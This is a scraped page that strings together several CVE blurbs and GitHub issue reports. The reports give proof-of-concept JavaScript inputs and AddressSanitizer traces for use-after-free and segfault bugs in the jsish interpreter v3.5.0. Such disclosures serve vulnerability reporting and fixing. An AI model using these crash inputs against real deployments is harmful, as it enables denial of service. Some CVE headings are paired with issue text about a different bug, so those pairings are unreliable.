Jsish v3.5.0 was discovered to contain a heap-use-after-free via Jsi_DecrRefCount in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-46489: Heap-use-after-free src/jsiValue.c:41 in Jsi_DecrRefCount · Issue #74 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via NumberConstructor at src/jsiNumber.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 2 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var list \= \[
    'aa',
    'hh'
\];
Number.bind(2, 4)();

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

ASAN:DEADLYSIGNAL
=================================================================
=====ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55d872876fd3 bp 0x7ffd8a3d6b10 sp 0x7ffd8a3d6240 T0)
=====The signal is caused by a READ memory access.
=====Hint: address points to the zero page.
    #0 0x55d872876fd2 in NumberConstructor src/jsiNumber.c:93
    #1 0x55d87284a818 in jsi\_FuncCallSub src/jsiProto.c:244
    #2 0x55d8727c7fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #3 0x55d8727c7fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #4 0x55d872843ad6 in jsi\_FuncBindCall src/jsiProto.c:299
    #5 0x55d87284a818 in jsi\_FuncCallSub src/jsiProto.c:244
    #6 0x55d872b1471a in jsiFunctionSubCall src/jsiEval.c:796
    #7 0x55d872b1471a in jsiEvalFunction src/jsiEval.c:837
    #8 0x55d872b1471a in jsiEvalCodeSub src/jsiEval.c:1264
    #9 0x55d872b2815e in jsi\_evalcode src/jsiEval.c:2204
    #10 0x55d872b2c274 in jsi\_evalStrFile src/jsiEval.c:2665
    #11 0x55d87281b66a in Jsi\_Main src/jsiInterp.c:936
    #12 0x55d87302003a in jsi\_main src/main.c:47
    #13 0x7fb276e6fbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #14 0x55d8727af969 in \_start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiNumber.c:93 in NumberConstructor

Credits: Found by OWL337 team.

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

This issue may have a correlation with #66, but I'm not for sure. Report this issue to assist your debug.

![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=88&v=4)

FIxed by fix for issue #66

2 participants

 ![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46490: SEGV src/jsiNumber.c:93 in NumberConstructor · Issue #67 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via /lib/x86_64-linux-gnu/libc.so.6+0x18e506. This vulnerability can lead to a Denial of Service (DoS).

CVE-2021-46487: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x18e506) · Issue #72 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via Jsi_ValueIsNumber at src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).

CVE-2021-46485: SEGV src/jsiValue.c:418 in Jsi_ValueIsNumber · Issue #70 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via jsi_ArrayConcatCmd at src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var i \= 0;

function JSEtest()
{
  arr\[arr\[1000\] \= 3\] \= 3;
  i++;
}

var arr \= new Array(10);
arr\[2\] \= 2;
arr.concat(JSEtest);

(arr.reduceRight(arr.concat), 0, '1');

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

ASAN:DEADLYSIGNAL
=================================================================
==121369==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x563e6997e690 bp 0x00000000000a sp 0x7ffcb3c19980 T0)
==121369==The signal is caused by a READ memory access.
==121369==Hint: address points to the zero page.
    #0 0x563e6997e68f in jsi\_ArrayConcatCmd src/jsiArray.c:311
    #1 0x563e69943818 in jsi\_FuncCallSub src/jsiProto.c:244
    #2 0x563e698c0fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #3 0x563e698c0fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #4 0x563e69985851 in jsi\_ArrayReduceSubCmd src/jsiArray.c:641
    #5 0x563e69985851 in jsi\_ArrayReduceRightCmd src/jsiArray.c:672
    #6 0x563e69943818 in jsi\_FuncCallSub src/jsiProto.c:244
    #7 0x563e69c0d71a in jsiFunctionSubCall src/jsiEval.c:796
    #8 0x563e69c0d71a in jsiEvalFunction src/jsiEval.c:837
    #9 0x563e69c0d71a in jsiEvalCodeSub src/jsiEval.c:1264
    #10 0x563e69c2115e in jsi\_evalcode src/jsiEval.c:2204
    #11 0x563e69c25274 in jsi\_evalStrFile src/jsiEval.c:2665
    #12 0x563e6991466a in Jsi\_Main src/jsiInterp.c:936
    #13 0x563e6a11903a in jsi\_main src/main.c:47
    #14 0x7fde1e7babf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #15 0x563e698a8969 in \_start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiArray.c:311 in jsi\_ArrayConcatCmd

Credits: Found by OWL337 team.

CVE-2021-46488: SEGV src/jsiArray.c:311 in jsi_ArrayConcatCmd · Issue #68 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via jsi_ArraySpliceCmd at src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).

CVE-2021-46486: SEGV src/jsiArray.c:1172 in jsi_ArraySpliceCmd · Issue #65 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ArgTypeCheck in src/jsiFunc.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 2 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var JSEtest \= \[
  'aa',
  'gg',
  'hhh',
  'mm',
  'nn'
\];
'sort:' + JSEtest.sort(function (str, position) {
  return JSEtest.unshift('pop:' + JSEtest.pop());
});
!'concat:' + JSEtest.concat().every(function (E) {
  return 'sort:' + JSEtest.sort(function (str, position) {
    return JSEtest.unshift('pop:' + JSEtest.pop());
  });
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007458 at pc 0x5566730cf1ca bp 0x7ffe092500c0 sp 0x7ffe092500b0
READ of size 1 at 0x603000007458 thread T0
    #0 0x5566730cf1c9 in jsi\_ArgTypeCheck src/jsiFunc.c:207
    #1 0x556673158c49 in jsi\_FuncCallSub src/jsiProto.c:263
    #2 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #3 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #4 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #5 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #6 0x556673158834 in jsi\_FuncCallSub src/jsiProto.c:220
    #7 0x5566730d4fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #8 0x5566730d4fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #9 0x556673186fa8 in SortSubCmd src/jsiArray.c:970
    #10 0x7f067f973311  (/lib/x86\_64-linux-gnu/libc.so.6+0x42311)
    #11 0x7f067f9736b5 in qsort\_r (/lib/x86\_64-linux-gnu/libc.so.6+0x426b5)
    #12 0x55667318a611 in jsi\_ArraySortCmd src/jsiArray.c:1065
    #13 0x556673157818 in jsi\_FuncCallSub src/jsiProto.c:244
    #14 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #15 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #16 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #17 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #18 0x556673158834 in jsi\_FuncCallSub src/jsiProto.c:220
    #19 0x5566730d4fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #20 0x5566730d4fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #21 0x55667319bf64 in jsi\_ArrayFindSubCmd src/jsiArray.c:576
    #22 0x55667319bf64 in jsi\_ArrayEveryCmd src/jsiArray.c:663
    #23 0x556673157818 in jsi\_FuncCallSub src/jsiProto.c:244
    #24 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #25 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #26 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #27 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #28 0x556673439274 in jsi\_evalStrFile src/jsiEval.c:2665
    #29 0x55667312866a in Jsi\_Main src/jsiInterp.c:936
    #30 0x55667392d03a in jsi\_main src/main.c:47
    #31 0x7f067f952bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #32 0x5566730bc969 in \_start (/usr/local/bin/jsish+0xe8969)

0x603000007458 is located 8 bytes inside of 32-byte region \[0x603000007450,0x603000007470)
freed by thread T0 here:
    #0 0x7f06805c17a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x5566730dd6cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7f06805c1d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55667312daa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiFunc.c:207 in jsi\_ArgTypeCheck
Shadow bytes around the buggy address:
  0x0c067fff8e30: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8e40: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8e50: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8e60: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8e70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
\=>0x0c067fff8e80: fd fd fa fa fd fd fd fd fa fa fd\[fd\]fd fd fa fa
  0x0c067fff8e90: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8ea0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8eb0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8ec0: fd fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd
  0x0c067fff8ed0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

This issue may be related to #74 & #80, especially the POC, but I'm not for sure. Report this issue to assist your debug.

![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=88&v=4)

2 participants

 ![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46500: Heap-use-after-free src/jsiFunc.c:207 in jsi_ArgTypeCheck · Issue #85 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_UserObjDelete in src/jsiUserObj.c. This vulnerability can lead to a Denial of Service (DoS).

CVE-2021-46497: Heap-use-after-free src/jsiUserObj.c:32 in jsi_UserObjDelete · Issue #84 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_wswebsocketObjFree in src/jsiWebSocket.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

console.printf\= (new WebSocket);
setTimeout(console, 100000);

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x61b000000080 at pc 0x55b167ed6de6 bp 0x7ffcd360f220 sp 0x7ffcd360f210
READ of size 4 at 0x61b000000080 thread T0
    #0 0x55b167ed6de5 in jsi\_wswebsocketObjFree src/jsiWebSocket.c:3190
    #1 0x55b167e7ba2d in jsi\_UserObjFree src/jsiUserObj.c:75
    #2 0x55b167dfeefb in Jsi\_ObjFree src/jsiObj.c:334
    #3 0x55b167dffa0f in Jsi\_ObjDecrRefCount src/jsiObj.c:440
    #4 0x55b167cae3d1 in ValueFree src/jsiValue.c:178
    #5 0x55b167cae3d1 in Jsi\_ValueFree src/jsiValue.c:199
    #6 0x55b167cae6cf in Jsi\_DecrRefCount src/jsiValue.c:52
    #7 0x55b167dfc697 in DeleteTreeValue src/jsiObj.c:177
    #8 0x55b167e14384 in Jsi\_TreeEntryDelete src/jsiTree.c:636
    #9 0x55b167e15f10 in destroy\_node src/jsiTree.c:496
    #10 0x55b167e15f10 in destroy\_node src/jsiTree.c:494
    #11 0x55b167e15f10 in Jsi\_TreeDelete src/jsiTree.c:515
    #12 0x55b167dfe9df in Jsi\_ObjFree src/jsiObj.c:348
    #13 0x55b167dffa0f in Jsi\_ObjDecrRefCount src/jsiObj.c:440
    #14 0x55b167cae3d1 in ValueFree src/jsiValue.c:178
    #15 0x55b167cae3d1 in Jsi\_ValueFree src/jsiValue.c:199
    #16 0x55b167cae6cf in Jsi\_DecrRefCount src/jsiValue.c:52
    #17 0x55b167dbe4d4 in Jsi\_EventFree src/jsiCmds.c:204
    #18 0x55b167cd44e2 in freeEventTbl src/jsiInterp.c:570
    #19 0x55b167d768dd in Jsi\_HashClear src/jsiHash.c:507
    #20 0x55b167d76cd7 in Jsi\_HashDelete src/jsiHash.c:526
    #21 0x55b167ce787c in jsiInterpDelete src/jsiInterp.c:1936
    #22 0x55b1684fe047 in jsi\_main src/main.c:49
    #23 0x7f5c2d555bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #24 0x55b167c8d969 in \_start (/usr/local/bin/jsish+0xe8969)

0x61b000000080 is located 0 bytes inside of 1656-byte region \[0x61b000000080,0x61b0000006f8)
freed by thread T0 here:
    #0 0x7f5c2e1c47a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x55b167ed6d22 in jsi\_wswebsocketObjFree src/jsiWebSocket.c:3199

previously allocated by thread T0 here:
    #0 0x7f5c2e1c4d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55b167cfeaa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiWebSocket.c:3190 in jsi\_wswebsocketObjFree
Shadow bytes around the buggy address:
  0x0c367fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c367fff8010:\[fd\]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46498: Heap-use-after-free src/jsiWebSocket.c:3190 in jsi_wswebsocketObjFree · Issue #81 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via SortSubCmd in src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var JSEtest \= \[
  'aa',
  'bb',
  'cc'
\];
var results \= JSEtest;
JSEtest.findIndex(function (kV) {
  JSEtest.sort(function (str, position) {
    results.push(kV);
  });
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
==106201==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000018678 at pc 0x56468deff5a0 bp 0x7fff9a37c2a0 sp 0x7fff9a37c290
READ of size 8 at 0x60c000018678 thread T0
    #0 0x56468deff59f in SortSubCmd src/jsiArray.c:958
    #1 0x7fb68d0b0311  (/lib/x86\_64-linux-gnu/libc.so.6+0x42311)
    #2 0x7fb68d0b027d  (/lib/x86\_64-linux-gnu/libc.so.6+0x4227d)
    #3 0x7fb68d0b027d  (/lib/x86\_64-linux-gnu/libc.so.6+0x4227d)
    #4 0x7fb68d0b06b5 in qsort\_r (/lib/x86\_64-linux-gnu/libc.so.6+0x426b5)
    #5 0x56468df02611 in jsi\_ArraySortCmd src/jsiArray.c:1065
    #6 0x56468decf818 in jsi\_FuncCallSub src/jsiProto.c:244
    #7 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796
    #8 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837
    #9 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264
    #10 0x56468e1ad15e in jsi\_evalcode src/jsiEval.c:2204
    #11 0x56468ded0834 in jsi\_FuncCallSub src/jsiProto.c:220
    #12 0x56468de4cfec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #13 0x56468de4cfec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #14 0x56468df0dc0b in jsi\_ArrayFindSubCmd src/jsiArray.c:576
    #15 0x56468df0dc0b in jsi\_ArrayFindIndexCmd src/jsiArray.c:666
    #16 0x56468decf818 in jsi\_FuncCallSub src/jsiProto.c:244
    #17 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796
    #18 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837
    #19 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264
    #20 0x56468e1ad15e in jsi\_evalcode src/jsiEval.c:2204
    #21 0x56468e1b1274 in jsi\_evalStrFile src/jsiEval.c:2665
    #22 0x56468dea066a in Jsi\_Main src/jsiInterp.c:936
    #23 0x56468e6a503a in jsi\_main src/main.c:47
    #24 0x7fb68d08fbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #25 0x56468de34969 in \_start (/usr/local/bin/jsish+0xe8969)

0x60c000018678 is located 56 bytes inside of 128-byte region \[0x60c000018640,0x60c0000186c0)
freed by thread T0 here:
    #0 0x7fb68dcfef30 in realloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x56468dea5972 in Jsi\_Realloc src/jsiUtils.c:47

previously allocated by thread T0 here:
    #0 0x7fb68dcfef30 in realloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x56468dea5972 in Jsi\_Realloc src/jsiUtils.c:47

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiArray.c:958 in SortSubCmd
Shadow bytes around the buggy address:
  0x0c187fffb070: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c187fffb080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c187fffb090: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c187fffb0a0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c187fffb0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0c187fffb0c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd\[fd\]
  0x0c187fffb0d0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c187fffb0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fffb0f0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c187fffb100: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c187fffb110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==106201\==ABORTING

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

Tag

#dos